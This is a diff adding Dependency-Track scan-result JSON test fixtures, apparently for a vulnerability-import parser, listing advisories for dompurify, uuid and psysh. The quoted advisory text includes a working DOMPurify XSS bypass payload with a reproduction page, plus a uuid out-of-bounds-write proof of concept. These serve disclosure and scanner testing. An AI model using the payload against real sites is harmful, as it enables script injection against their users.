+                "title": "DOMPurify: Prototype Pollution to XSS Bypass via CUSTOM_ELEMENT_HANDLING Fallback",
+                "cwes": [
+                    {
+                        "cweId": 79,
+                        "name": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')"
+                    },
+                    {
+                        "cweId": 1321,
+                        "name": "Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')"
+                    }
+                ],
+                "uuid": "ffaa8bbf-c761-46e5-bfb1-b50cfbb7a907",
+                "severityRank": 2,
+                "cweName": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')"
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:c3cf13d0-de48-4aae-ad53-710da9a90825:ffaa8bbf-c761-46e5-bfb1-b50cfbb7a907",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "name": "dompurify",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a56",
+                "purl": "pkg:npm/dompurify@3.3.3",
+                "uuid": "c3cf13d0-de48-4aae-ad53-710da9a90825",
+                "version": "3.3.3",
+                "latestVersion": "3.4.1"
+            },
+            "attribution": {
+                "analyzerIdentity": "INTERNAL_ANALYZER",
+                "attributedOn": "2026-04-22 23:25:18.308"
+            },
+            "vulnerability": {
+                "severity": "MEDIUM",
+                "cvssV3BaseScore": 6.8,
+                "vulnId": "GHSA-crv5-9vww-q3g8",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-crv5-9vww-q3g8",
+                        "cveId": "CVE-2026-41239"
+                    }
+                ],
+                "references": "* [https://github.com/cure53/DOMPurify/security/advisories/GHSA-crv5-9vww-q3g8](https://github.com/cure53/DOMPurify/security/advisories/GHSA-crv5-9vww-q3g8)\n* [https://github.com/cure53/DOMPurify/releases/tag/3.4.0](https://github.com/cure53/DOMPurify/releases/tag/3.4.0)\n* [https://github.com/advisories/GHSA-crv5-9vww-q3g8](https://github.com/advisories/GHSA-crv5-9vww-q3g8)",
+                "cweId": 79,
+                "description": "## Summary\n\n| Field | Value |\n|:------|:------|\n| **Severity** | Medium |\n| **Affected** | DOMPurify `main` at [`883ac15`](https://github.com/cure53/DOMPurify/tree/883ac15d47f907cb1a3b5a152fe90c4d8c10f9e6), introduced in v1.0.10 ([`7fc196db`](https://github.com/cure53/DOMPurify/commit/7fc196db0b42a0c360262dba0cc39c9c91bfe1ec)) |\n\n`SAFE_FOR_TEMPLATES` strips `{{...}}` expressions from untrusted HTML. This works in string mode but not with `RETURN_DOM` or `RETURN_DOM_FRAGMENT`, allowing XSS via template-evaluating frameworks like Vue 2.\n\n## Technical Details\n\nDOMPurify strips template expressions in two passes:\n\n1. **Per-node** \u2014 each text node is checked during the tree walk ([`purify.ts:1179-1191`](https://github.com/cure53/DOMPurify/blob/883ac15d47f907cb1a3b5a152fe90c4d8c10f9e6/src/purify.ts#L1179-L1191)):\n\n```js\n// pass #1: runs on every text node during tree walk\nif (SAFE_FOR_TEMPLATES && currentNode.nodeType === NODE_TYPE.text) {\n  content = currentNode.textContent;\n  content = content.replace(MUSTACHE_EXPR, ' ');  // {{...}} -> ' '\n  content = content.replace(ERB_EXPR, ' ');        // <%...%> -> ' '\n  content = content.replace(TMPLIT_EXPR, ' ');      // ${...  -> ' '\n  currentNode.textContent = content;\n}\n```\n\n2. **Final string scrub** \u2014 after serialization, the full HTML string is scrubbed again ([`purify.ts:1679-1683`](https://github.com/cure53/DOMPurify/blob/883ac15d47f907cb1a3b5a152fe90c4d8c10f9e6/src/purify.ts#L1679-L1683)). This is the safety net that catches expressions that only form after the DOM settles.\n\nThe `RETURN_DOM` path returns before pass #2 ever runs ([`purify.ts:1637-1661`](https://github.com/cure53/DOMPurify/blob/883ac15d47f907cb1a3b5a152fe90c4d8c10f9e6/src/purify.ts#L1637-L1661)):\n\n```js\n// purify.ts (simplified)\n\nif (RETURN_DOM) {\n  // ... build returnNode ...\n  return returnNode;        // <-- exits here, pass #2 never runs\n}\n\n// pass #2: only reached by string-mode callers\nif (SAFE_FOR_TEMPLATES) {\n  serializedHTML = serializedHTML.replace(MUSTACHE_EXPR, ' ');\n}\nreturn serializedHTML;\n```\n\nThe payload `{<foo><\/foo>{constructor.constructor('alert(1)')()}<foo><\/foo>}` exploits this:\n\n1. Parser creates: `TEXT(\"{\")` → `<foo>` → `TEXT(\"{payload}\")` → `<foo>` → `TEXT(\"}\")` \u2014 no single node contains `{{`, so pass #1 misses it\n2. `<foo>` is not allowed, so DOMPurify removes it but keeps surrounding text\n3. The three text nodes are now adjacent \u2014 `.outerHTML` reads them as `{{payload}}`, which Vue 2 compiles and executes\n\n## Reproduce\n\nOpen the following html in any browser and `alert(1)` pops up.\n\n```html\n<!DOCTYPE html>\n<html>\n\n<body>\n  <script src=\"https://cdn.jsdelivr.net/npm/dompurify@3.3.3/dist/purify.min.js\"><\/script>\n  <script src=\"https://cdn.jsdelivr.net/npm/vue@2.7.16/dist/vue.min.js\"><\/script>\n  <script>\n    var dirty = '<div id=\"app\">{<foo><\/foo>{constructor.constructor(\"alert(1)\")()}<foo><\/foo>}<\/div>';\n    var dom = DOMPurify.sanitize(dirty, { SAFE_FOR_TEMPLATES: true, RETURN_DOM: true });\n    document.body.appendChild(dom.firstChild);\n    new Vue({ el: '#app' });\n  <\/script>\n<\/body>\n\n<\/html>\n```\n\n## Impact\n\nAny application that sanitizes attacker-controlled HTML with `SAFE_FOR_TEMPLATES: true` and `RETURN_DOM: true` (or `RETURN_DOM_FRAGMENT: true`), then mounts the result into a template-evaluating framework, is vulnerable to XSS.\n\n## Recommendations\n\n### Fix\n\n`normalize()` merges the split text nodes, then the same regex from the string path catches the expression. Placed before the fragment logic, this fixes both `RETURN_DOM` and `RETURN_DOM_FRAGMENT`.\n\n```diff\n     if (RETURN_DOM) {\n+      if (SAFE_FOR_TEMPLATES) {\n+        body.normalize();\n+        let html = body.innerHTML;\n+        arrayForEach([MUSTACHE_EXPR, ERB_EXPR, TMPLIT_EXPR], (expr: RegExp) => {\n+          html = stringReplace(html, expr, ' ');\n+        });\n+        body.innerHTML = html;\n+      }\n+\n       if (RETURN_DOM_FRAGMENT) {\n         returnNode = createDocumentFragment.call(body.ownerDocument);\n```",
+                "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N",
+                "source": "GITHUB",
+                "published": "2026-04-22 17:32:54.0",
+                "title": "DOMPurify has a SAFE_FOR_TEMPLATES bypass in RETURN_DOM mode",
+                "cwes": [
+                    {
+                        "cweId": 79,
+                        "name": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')"
+                    },
+                    {
+                        "cweId": 1289,
+                        "name": "Improper Validation of Unsafe Equivalence in Input"
+                    }
+                ],
+                "uuid": "4e8e64eb-da2c-45a9-afc3-f74d88b11c98",
+                "severityRank": 2,
+                "cweName": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')"
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:c3cf13d0-de48-4aae-ad53-710da9a90825:4e8e64eb-da2c-45a9-afc3-f74d88b11c98",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "name": "uuid",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a56",
+                "purl": "pkg:npm/uuid@8.3.2",
+                "uuid": "3b3a5fdb-c854-4775-a09f-097267e05c3d",
+                "version": "8.3.2",
+                "latestVersion": "14.0.0"
+            },
+            "attribution": {
+                "analyzerIdentity": "INTERNAL_ANALYZER",
+                "attributedOn": "2026-04-23 11:22:56.166"
+            },
+            "vulnerability": {
+                "severity": "MEDIUM",
+                "vulnId": "GHSA-w5hq-g745-h8pq",
+                "aliases": [],
+                "references": "* [https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq](https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq)\n* [https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34](https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34)\n* [https://github.com/uuidjs/uuid/releases/tag/v14.0.0](https://github.com/uuidjs/uuid/releases/tag/v14.0.0)\n* [https://github.com/advisories/GHSA-w5hq-g745-h8pq](https://github.com/advisories/GHSA-w5hq-g745-h8pq)",
+                "cvssV4Score": 6.3,
+                "cweId": 787,
+                "description": "### Summary\n\n`v3`, `v5`, and `v6` accept external output buffers but do not reject out-of-range writes (small `buf` or large `offset`).  \nBy contrast, `v4`, `v1`, and `v7` explicitly throw `RangeError` on invalid bounds.\n\nThis inconsistency allows **silent partial writes** into caller-provided buffers.\n\n\n### Affected code\n\n- `src/v35.ts` (`v3`/`v5` path) writes `buf[offset + i]` without bounds validation.\n- `src/v6.ts` writes `buf[offset + i]` without bounds validation.\n\n### Reproducible PoC\n\n```bash\ncd /home/StrawHat/uuid\nnpm ci\nnpm run build\n\nnode --input-type=module -e \"\nimport {v4,v5,v6} from './dist-node/index.js';\nconst ns='6ba7b810-9dad-11d1-80b4-00c04fd430c8';\nfor (const [name,fn] of [\n  ['v4',()=>v4({},new Uint8Array(8),4)],\n  ['v5',()=>v5('x',ns,new Uint8Array(8),4)],\n  ['v6',()=>v6({},new Uint8Array(8),4)],\n]) {\n  try { fn(); console.log(name,'NO_THROW'); }\n  catch(e){ console.log(name,'THREW',e.name); }\n}\"\n```\n\nObserved:\n\n- `v4 THREW RangeError`\n- `v5 NO_THROW`\n- `v6 NO_THROW`\n\nExample partial overwrite evidence captured during audit:\n\n```text\nsame true buf [\n  170, 170, 170, 170,\n   75, 224, 100,  63\n]\nv6 [\n  187, 187, 187, 187,\n   31,  19, 185,  64\n]\n```\n\n### Security impact\n\n- **Primary**: integrity/robustness issue (silent partial output).\n- If an application assumes full UUID writes into preallocated buffers, this can produce malformed/truncated/partially stale identifiers without error.\n- In systems where caller-controlled offsets/buffer sizes are exposed indirectly, this may become a security-relevant logic flaw.\n\n### Suggested fix\n\nAdd the same guard used by `v4`/`v1`/`v7`:\n\n```ts\nif (offset < 0 || offset + 16 > buf.length) {\n  throw new RangeError(`UUID byte range ${offset}:${offset + 15} is out of buffer bounds`);\n}\n```\n\nApply to:\n\n- `src/v35.ts` (covers `v3` and `v5`)\n- `src/v6.ts`",
+                "source": "GITHUB",
+                "published": "2026-04-22 20:53:24.0",
+                "title": "uuid: Missing buffer bounds check in v3/v5/v6 when buf is provided",
+                "cwes": [
+                    {
+                        "cweId": 787,
+                        "name": "Out-of-bounds Write"
+                    },
+                    {
+                        "cweId": 1285,
+                        "name": "Improper Validation of Specified Index, Position, or Offset in Input"
+                    }
+                ],
+                "uuid": "4ed7a03a-7f55-47cc-9ae6-dad5c0d8a59c",
+                "severityRank": 2,
+                "cweName": "Out-of-bounds Write",
+                "cvssV4Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:3b3a5fdb-c854-4775-a09f-097267e05c3d:4ed7a03a-7f55-47cc-9ae6-dad5c0d8a59c",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "name": "uuid",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a56",
+                "purl": "pkg:npm/uuid@11.1.0",
+                "uuid": "49c53e83-f203-4c95-9909-375d00e3ffef",
+                "version": "11.1.0",
+                "latestVersion": "14.0.0"
+            },
+            "attribution": {
+                "analyzerIdentity": "INTERNAL_ANALYZER",
+                "attributedOn": "2026-04-23 11:22:56.961"
+            },
+            "vulnerability": {
+                "severity": "MEDIUM",
+                "vulnId": "GHSA-w5hq-g745-h8pq",
+                "aliases": [],
+                "references": "* [https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq](https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq)\n* [https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34](https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34)\n* [https://github.com/uuidjs/uuid/releases/tag/v14.0.0](https://github.com/uuidjs/uuid/releases/tag/v14.0.0)\n* [https://github.com/advisories/GHSA-w5hq-g745-h8pq](https://github.com/advisories/GHSA-w5hq-g745-h8pq)",
+                "cvssV4Score": 6.3,
+                "cweId": 787,
+                "description": "### Summary\n\n`v3`, `v5`, and `v6` accept external output buffers but do not reject out-of-range writes (small `buf` or large `offset`).  \nBy contrast, `v4`, `v1`, and `v7` explicitly throw `RangeError` on invalid bounds.\n\nThis inconsistency allows **silent partial writes** into caller-provided buffers.\n\n\n### Affected code\n\n- `src/v35.ts` (`v3`/`v5` path) writes `buf[offset + i]` without bounds validation.\n- `src/v6.ts` writes `buf[offset + i]` without bounds validation.\n\n### Reproducible PoC\n\n```bash\ncd /home/StrawHat/uuid\nnpm ci\nnpm run build\n\nnode --input-type=module -e \"\nimport {v4,v5,v6} from './dist-node/index.js';\nconst ns='6ba7b810-9dad-11d1-80b4-00c04fd430c8';\nfor (const [name,fn] of [\n  ['v4',()=>v4({},new Uint8Array(8),4)],\n  ['v5',()=>v5('x',ns,new Uint8Array(8),4)],\n  ['v6',()=>v6({},new Uint8Array(8),4)],\n]) {\n  try { fn(); console.log(name,'NO_THROW'); }\n  catch(e){ console.log(name,'THREW',e.name); }\n}\"\n```\n\nObserved:\n\n- `v4 THREW RangeError`\n- `v5 NO_THROW`\n- `v6 NO_THROW`\n\nExample partial overwrite evidence captured during audit:\n\n```text\nsame true buf [\n  170, 170, 170, 170,\n   75, 224, 100,  63\n]\nv6 [\n  187, 187, 187, 187,\n   31,  19, 185,  64\n]\n```\n\n### Security impact\n\n- **Primary**: integrity/robustness issue (silent partial output).\n- If an application assumes full UUID writes into preallocated buffers, this can produce malformed/truncated/partially stale identifiers without error.\n- In systems where caller-controlled offsets/buffer sizes are exposed indirectly, this may become a security-relevant logic flaw.\n\n### Suggested fix\n\nAdd the same guard used by `v4`/`v1`/`v7`:\n\n```ts\nif (offset < 0 || offset + 16 > buf.length) {\n  throw new RangeError(`UUID byte range ${offset}:${offset + 15} is out of buffer bounds`);\n}\n```\n\nApply to:\n\n- `src/v35.ts` (covers `v3` and `v5`)\n- `src/v6.ts`",
+                "source": "GITHUB",
+                "published": "2026-04-22 20:53:24.0",
+                "title": "uuid: Missing buffer bounds check in v3/v5/v6 when buf is provided",
+                "cwes": [
+                    {
+                        "cweId": 787,
+                        "name": "Out-of-bounds Write"
+                    },
+                    {
+                        "cweId": 1285,
+                        "name": "Improper Validation of Specified Index, Position, or Offset in Input"
+                    }
+                ],
+                "uuid": "4ed7a03a-7f55-47cc-9ae6-dad5c0d8a59c",
+                "severityRank": 2,
+                "cweName": "Out-of-bounds Write",
+                "cvssV4Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:49c53e83-f203-4c95-9909-375d00e3ffef:4ed7a03a-7f55-47cc-9ae6-dad5c0d8a59c",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "name": "uuid",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a56",
+                "purl": "pkg:npm/uuid@9.0.1",
+                "uuid": "1983259d-6f2d-4b45-a7aa-1b55597d68fc",
+                "version": "9.0.1",
+                "latestVersion": "14.0.0"
+            },
+            "attribution": {
+                "analyzerIdentity": "INTERNAL_ANALYZER",
+                "attributedOn": "2026-04-23 11:22:57.306"
+            },
+            "vulnerability": {
+                "severity": "MEDIUM",
+                "vulnId": "GHSA-w5hq-g745-h8pq",
+                "aliases": [],
+                "references": "* [https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq](https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq)\n* [https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34](https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34)\n* [https://github.com/uuidjs/uuid/releases/tag/v14.0.0](https://github.com/uuidjs/uuid/releases/tag/v14.0.0)\n* [https://github.com/advisories/GHSA-w5hq-g745-h8pq](https://github.com/advisories/GHSA-w5hq-g745-h8pq)",
+                "cvssV4Score": 6.3,
+                "cweId": 787,
+                "description": "### Summary\n\n`v3`, `v5`, and `v6` accept external output buffers but do not reject out-of-range writes (small `buf` or large `offset`).  \nBy contrast, `v4`, `v1`, and `v7` explicitly throw `RangeError` on invalid bounds.\n\nThis inconsistency allows **silent partial writes** into caller-provided buffers.\n\n\n### Affected code\n\n- `src/v35.ts` (`v3`/`v5` path) writes `buf[offset + i]` without bounds validation.\n- `src/v6.ts` writes `buf[offset + i]` without bounds validation.\n\n### Reproducible PoC\n\n```bash\ncd /home/StrawHat/uuid\nnpm ci\nnpm run build\n\nnode --input-type=module -e \"\nimport {v4,v5,v6} from './dist-node/index.js';\nconst ns='6ba7b810-9dad-11d1-80b4-00c04fd430c8';\nfor (const [name,fn] of [\n  ['v4',()=>v4({},new Uint8Array(8),4)],\n  ['v5',()=>v5('x',ns,new Uint8Array(8),4)],\n  ['v6',()=>v6({},new Uint8Array(8),4)],\n]) {\n  try { fn(); console.log(name,'NO_THROW'); }\n  catch(e){ console.log(name,'THREW',e.name); }\n}\"\n```\n\nObserved:\n\n- `v4 THREW RangeError`\n- `v5 NO_THROW`\n- `v6 NO_THROW`\n\nExample partial overwrite evidence captured during audit:\n\n```text\nsame true buf [\n  170, 170, 170, 170,\n   75, 224, 100,  63\n]\nv6 [\n  187, 187, 187, 187,\n   31,  19, 185,  64\n]\n```\n\n### Security impact\n\n- **Primary**: integrity/robustness issue (silent partial output).\n- If an application assumes full UUID writes into preallocated buffers, this can produce malformed/truncated/partially stale identifiers without error.\n- In systems where caller-controlled offsets/buffer sizes are exposed indirectly, this may become a security-relevant logic flaw.\n\n### Suggested fix\n\nAdd the same guard used by `v4`/`v1`/`v7`:\n\n```ts\nif (offset < 0 || offset + 16 > buf.length) {\n  throw new RangeError(`UUID byte range ${offset}:${offset + 15} is out of buffer bounds`);\n}\n```\n\nApply to:\n\n- `src/v35.ts` (covers `v3` and `v5`)\n- `src/v6.ts`",
+                "source": "GITHUB",
+                "published": "2026-04-22 20:53:24.0",
+                "title": "uuid: Missing buffer bounds check in v3/v5/v6 when buf is provided",
+                "cwes": [
+                    {
+                        "cweId": 787,
+                        "name": "Out-of-bounds Write"
+                    },
+                    {
+                        "cweId": 1285,
+                        "name": "Improper Validation of Specified Index, Position, or Offset in Input"
+                    }
+                ],
+                "uuid": "4ed7a03a-7f55-47cc-9ae6-dad5c0d8a59c",
+                "severityRank": 2,
+                "cweName": "Out-of-bounds Write",
+                "cvssV4Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:1983259d-6f2d-4b45-a7aa-1b55597d68fc:4ed7a03a-7f55-47cc-9ae6-dad5c0d8a59c",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "name": "dompurify",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a56",
+                "purl": "pkg:npm/dompurify@3.3.3",
+                "uuid": "c3cf13d0-de48-4aae-ad53-710da9a90825",
+                "version": "3.3.3",
+                "latestVersion": "3.4.1"
+            },
+            "attribution": {
+                "analyzerIdentity": "OSSINDEX_ANALYZER",
+                "attributedOn": "2026-04-23 23:20:41.313"
+            },
+            "vulnerability": {
+                "severity": "MEDIUM",
+                "cvssV3BaseScore": 6.9,
+                "vulnId": "CVE-2026-41238",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-v9jr-rg53-9pgp",
+                        "cveId": "CVE-2026-41238"
+                    }
+                ],
+                "references": "* [https://github.com/cure53/DOMPurify/releases/tag/3.4.0](https://github.com/cure53/DOMPurify/releases/tag/3.4.0)\n* [https://github.com/cure53/DOMPurify/security/advisories/GHSA-v9jr-rg53-9pgp](https://github.com/cure53/DOMPurify/security/advisories/GHSA-v9jr-rg53-9pgp)",
+                "cweId": 79,
+                "description": "DOMPurify is a DOM-only cross-site scripting sanitizer for HTML, MathML, and SVG. Versions 3.0.1 through 3.3.3 are vulnerable to a prototype pollution-based XSS bypass. When an application uses `DOMPurify.sanitize()` with the default configuration (no `CUSTOM_ELEMENT_HANDLING` option), a prior prototype pollution gadget can inject permissive `tagNameCheck` and `attributeNameCheck` regex values into `Object.prototype`, causing DOMPurify to allow arbitrary custom elements with arbitrary attributes \u2014 including event handlers \u2014 through sanitization. Version 3.4.0 fixes the issue.",
+                "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N",
+                "epssScore": 0.00033,
+                "source": "NVD",
+                "published": "2026-04-23 16:16:26.42",
+                "cwes": [
+                    {
+                        "cweId": 79,
+                        "name": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')"
+                    },
+                    {
+                        "cweId": 1321,
+                        "name": "Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')"
+                    }
+                ],
+                "uuid": "e6d4f904-dafa-4502-9c27-92081ebb7cd6",
+                "severityRank": 2,
+                "cweName": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')",
+                "epssPercentile": 0.09722
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:c3cf13d0-de48-4aae-ad53-710da9a90825:e6d4f904-dafa-4502-9c27-92081ebb7cd6",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "name": "dompurify",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a56",
+                "purl": "pkg:npm/dompurify@3.3.3",
+                "uuid": "c3cf13d0-de48-4aae-ad53-710da9a90825",
+                "version": "3.3.3",
+                "latestVersion": "3.4.1"
+            },
+            "attribution": {
+                "analyzerIdentity": "OSSINDEX_ANALYZER",
+                "attributedOn": "2026-04-23 23:20:41.369"
+            },
+            "vulnerability": {
+                "severity": "MEDIUM",
+                "cvssV3BaseScore": 6.8,
+                "vulnId": "CVE-2026-41239",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-crv5-9vww-q3g8",
+                        "cveId": "CVE-2026-41239"
+                    }
+                ],
+                "references": "* [https://github.com/cure53/DOMPurify/releases/tag/3.4.0](https://github.com/cure53/DOMPurify/releases/tag/3.4.0)\n* [https://github.com/cure53/DOMPurify/security/advisories/GHSA-crv5-9vww-q3g8](https://github.com/cure53/DOMPurify/security/advisories/GHSA-crv5-9vww-q3g8)",
+                "cweId": 79,
+                "description": "DOMPurify is a DOM-only cross-site scripting sanitizer for HTML, MathML, and SVG. Starting in version 1.0.10 and prior to version 3.4.0, `SAFE_FOR_TEMPLATES` strips `{{...}}` expressions from untrusted HTML. This works in string mode but not with `RETURN_DOM` or `RETURN_DOM_FRAGMENT`, allowing XSS via template-evaluating frameworks like Vue 2. Version 3.4.0 patches the issue.",
+                "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N",
+                "epssScore": 0.00048,
+                "source": "NVD",
+                "published": "2026-04-23 16:16:26.56",
+                "cwes": [
+                    {
+                        "cweId": 79,
+                        "name": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')"
+                    },
+                    {
+                        "cweId": 1289,
+                        "name": "Improper Validation of Unsafe Equivalence in Input"
+                    }
+                ],
+                "uuid": "6ba91a7e-28ee-4268-a031-69ba2bdd9e75",
+                "severityRank": 2,
+                "cweName": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')",
+                "epssPercentile": 0.14871
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:c3cf13d0-de48-4aae-ad53-710da9a90825:6ba91a7e-28ee-4268-a031-69ba2bdd9e75",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "name": "dompurify",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a56",
+                "purl": "pkg:npm/dompurify@3.3.3",
+                "uuid": "c3cf13d0-de48-4aae-ad53-710da9a90825",
+                "version": "3.3.3",
+                "latestVersion": "3.4.1"
+            },
+            "attribution": {
+                "alternateIdentifier": "CVE-2026-41240",
+                "analyzerIdentity": "OSSINDEX_ANALYZER",
+                "attributedOn": "2026-04-24 16:04:30.817",
+                "referenceUrl": "https://ossindex.sonatype.org/vulnerability/CVE-2026-41240?component-type=npm&component-name=dompurify&utm_source=dependency-track&utm_medium=integration&utm_content=v4.14.1"
+            },
+            "vulnerability": {
+                "severity": "MEDIUM",
+                "vulnId": "CVE-2026-41240",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-h7mw-gpvr-xq4m",
+                        "cveId": "CVE-2026-41240"
+                    }
+                ],
+                "references": "* [https://github.com/cure53/DOMPurify/commit/c361baa18dbdcb3344a41110f4c48ad85bf48f80](https://github.com/cure53/DOMPurify/commit/c361baa18dbdcb3344a41110f4c48ad85bf48f80)\n* [https://github.com/cure53/DOMPurify/releases/tag/3.4.0](https://github.com/cure53/DOMPurify/releases/tag/3.4.0)\n* [https://github.com/cure53/DOMPurify/security/advisories/GHSA-h7mw-gpvr-xq4m](https://github.com/cure53/DOMPurify/security/advisories/GHSA-h7mw-gpvr-xq4m)",
+                "cvssV4Score": 6,
+                "cweId": 79,
+                "description": "DOMPurify is a DOM-only cross-site scripting sanitizer for HTML, MathML, and SVG. Versions prior to 3.4.0 have an inconsistency between FORBID_TAGS and FORBID_ATTR handling when function-based ADD_TAGS is used. Commit c361baa added an early exit for FORBID_ATTR at line 1214. The same fix was not applied to FORBID_TAGS. At line 1118-1123, when EXTRA_ELEMENT_HANDLING.tagCheck returns true, the short-circuit evaluation skips the FORBID_TAGS check entirely. This allows forbidden elements to survive sanitization with their attributes intact. Version 3.4.0 patches the issue.",
+                "epssScore": 0.00045,
+                "source": "NVD",
+                "published": "2026-04-23 16:16:26.71",
+                "cwes": [
+                    {
+                        "cweId": 79,
+                        "name": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')"
+                    },
+                    {
+                        "cweId": 183,
+                        "name": "Permissive List of Allowed Inputs"
+                    }
+                ],
+                "uuid": "d400258f-b33b-45be-a7d7-0ec00bfaf50f",
+                "severityRank": 2,
+                "cweName": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')",
+                "cvssV4Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
+                "epssPercentile": 0.13604
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:c3cf13d0-de48-4aae-ad53-710da9a90825:d400258f-b33b-45be-a7d7-0ec00bfaf50f",
+            "analysis": {
+                "isSuppressed": false
+            }
+        }
+    ],
+    "project": {
+        "name": "acme/acme-site (npm)",
+        "purl": "pkg:npm/acme-site@1.0.0",
+        "uuid": "ca4f2da9-0fad-4a13-92d7-f627f3168a56",
+        "version": "develop"
+    },
+    "version": "1.3"
+}

--- a/unittests/scans/dependency_track/deptrack_php_4.14.1.json
+++ b/unittests/scans/dependency_track/deptrack_php_4.14.1.json
@@ -1,0 +1,643 @@
+{
+    "meta": {
+        "baseUrl": "http://dtrack.example.org",
+        "application": "Dependency-Track",
+        "version": "4.14.1",
+        "timestamp": "2026-04-24T19:38:13Z"
+    },
+    "findings": [
+        {
+            "component": {
+                "latestVersion": "v0.12.22",
+                "name": "psysh",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a57",
+                "purl": "pkg:composer/psy/psysh@v0.12.10",
+                "uuid": "31e34ab6-b84e-42f1-905c-60f3aac1d3bc",
+                "version": "v0.12.10",
+                "group": "psy"
+            },
+            "attribution": {
+                "analyzerIdentity": "INTERNAL_ANALYZER",
+                "attributedOn": "2026-02-20 12:59:34.289"
+            },
+            "vulnerability": {
+                "severity": "MEDIUM",
+                "cvssV3BaseScore": 6.7,
+                "vulnId": "GHSA-4486-gxhx-5mg7",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-4486-gxhx-5mg7",
+                        "cveId": "CVE-2026-25129"
+                    }
+                ],
+                "references": "* [https://github.com/bobthecow/psysh/security/advisories/GHSA-4486-gxhx-5mg7](https://github.com/bobthecow/psysh/security/advisories/GHSA-4486-gxhx-5mg7)\n* [https://github.com/bobthecow/psysh/releases/tag/v0.11.23](https://github.com/bobthecow/psysh/releases/tag/v0.11.23)\n* [https://github.com/bobthecow/psysh/releases/tag/v0.12.19](https://github.com/bobthecow/psysh/releases/tag/v0.12.19)\n* [https://nvd.nist.gov/vuln/detail/CVE-2026-25129](https://nvd.nist.gov/vuln/detail/CVE-2026-25129)\n* [https://github.com/advisories/GHSA-4486-gxhx-5mg7](https://github.com/advisories/GHSA-4486-gxhx-5mg7)",
+                "cweId": 427,
